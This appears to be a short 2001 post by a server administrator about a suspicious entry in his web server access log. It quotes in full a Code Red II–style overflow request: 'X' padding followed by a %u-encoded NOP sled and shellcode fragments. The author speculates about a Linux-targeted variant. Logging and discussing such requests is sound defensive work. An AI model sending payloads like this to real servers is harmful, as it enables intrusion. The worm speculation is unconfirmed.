I was playing around with crunching access logs and found that grep -v default.ida brought this in. Of course it may be an error, but I cn't help wondering if there might be a way that something that looked like a CRII but that was targeted at penguins might be hatching in some scriptkiddies deranged little brain :-[ 63.195.113.173 - - [06/Sep/2001:22:38:27 -0700] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 - note that is says http 400 but still...
